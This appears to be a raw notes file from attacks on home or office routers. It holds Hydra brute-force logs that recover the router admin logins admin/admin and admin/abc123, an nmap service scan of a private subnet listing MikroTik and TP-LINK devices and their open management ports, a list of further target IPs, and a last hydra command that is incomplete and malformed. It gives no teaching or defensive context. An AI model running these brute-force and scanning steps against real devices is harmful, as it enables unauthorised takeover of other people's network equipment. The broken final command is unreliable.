

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-05 23:07:28
[DATA] max 30 tasks per 1 server, overall 30 tasks, 1530 login tries (l:34/p:0), ~45 tries per task
[DATA] attacking http-get://192.168.0.1:80/
[80][http-get] host: 192.168.0.1   login: admin   password: admin
[STATUS] attack finished for 192.168.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-05 23:07:29

================
[80][http-get] host: 192.168.1.1   login: admin   password: abc123
[STATUS] attack finished for 192.168.1.1 (valid pair found)

===============
nmap -sV 192.168.0.1/24
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-09 19:04 UTC
Nmap scan report for 192.168.0.1
Host is up (0.0053s latency).
Not shown: 992 closed ports
PORT     STATE SERVICE        VERSION
53/tcp   open  domain         (generic dns response: NOTIMP)
80/tcp   open  http           MikroTik router config httpd
1111/tcp open  http           TP-LINK TD-W8968 http admin
1723/tcp open  pptp           MikroTik (Firmware: 1)
2000/tcp open  bandwidth-test MikroTik bandwidth-test server
4321/tcp open  winbox         MikroTik WinBox
7070/tcp open  http           MikroTik router config httpd
7777/tcp open  routeros-api   MikroTik RouterOS API
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/9%Time=5E669387%P=i686-pc-linux-gnu%r(DNSVers
SF:ionBindReqTCP,E,"\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0")%r(DNSStatusRequ
SF:estTCP,E,"\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0");
Service Info: Host: HWATEF-DAMG; OS: RouterOS; Devices: router, WAP; CPE: cpe:/o:mikrotik:routeros, cpe:/h:tp-link:td-w8968

Nmap scan report for 192.168.0.251
Host is up (0.011s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       (generic dns response: NOTIMP)
443/tcp  open  ssl/https?
1723/tcp open  pptp         MikroTik (Firmware: 1)
7777/tcp open  routeros-api MikroTik RouterOS API
8080/tcp open  http         MikroTik router config httpd
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/9%Time=5E669387%P=i686-pc-linux-gnu%r(DNSVers
SF:ionBindReqTCP,E,"\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0")%r(DNSStatusRequ
SF:estTCP,E,"\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0");
Service Info: Host: HWATEF-NET; OS: RouterOS; Device: router; CPE: cpe:/o:mikrotik:routeros

Nmap scan report for 192.168.0.252
Host is up (0.0080s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain       (generic dns response: NOTIMP)
443/tcp  open  ssl/https?
1723/tcp open  pptp         MikroTik (Firmware: 1)
7777/tcp open  routeros-api MikroTik RouterOS API
8080/tcp open  http         MikroTik router config httpd
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/9%Time=5E669387%P=i686-pc-linux-gnu%r(DNSVers
SF:ionBindReqTCP,E,"\0\x0c\0\x06\x81\x84\0\0\0\0\0\0\0\0")%r(DNSStatusRequ
SF:estTCP,E,"\0\x0c\0\0\x90\x84\0\0\0\0\0\0\0\0");
Service Info: Host: HWATEF-NET; OS: RouterOS; Device: router; CPE: cpe:/o:mikrotik:routeros

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 189.28 seconds



==========================
192.168.1.77
192.168.2.77
192.168.3.77
192.168.4.77
192.168.5.78
192.168.6.78




==================================
https://router-network.com/ip/10-0-0-1

hydra -l admin -P http://192.168.0.1
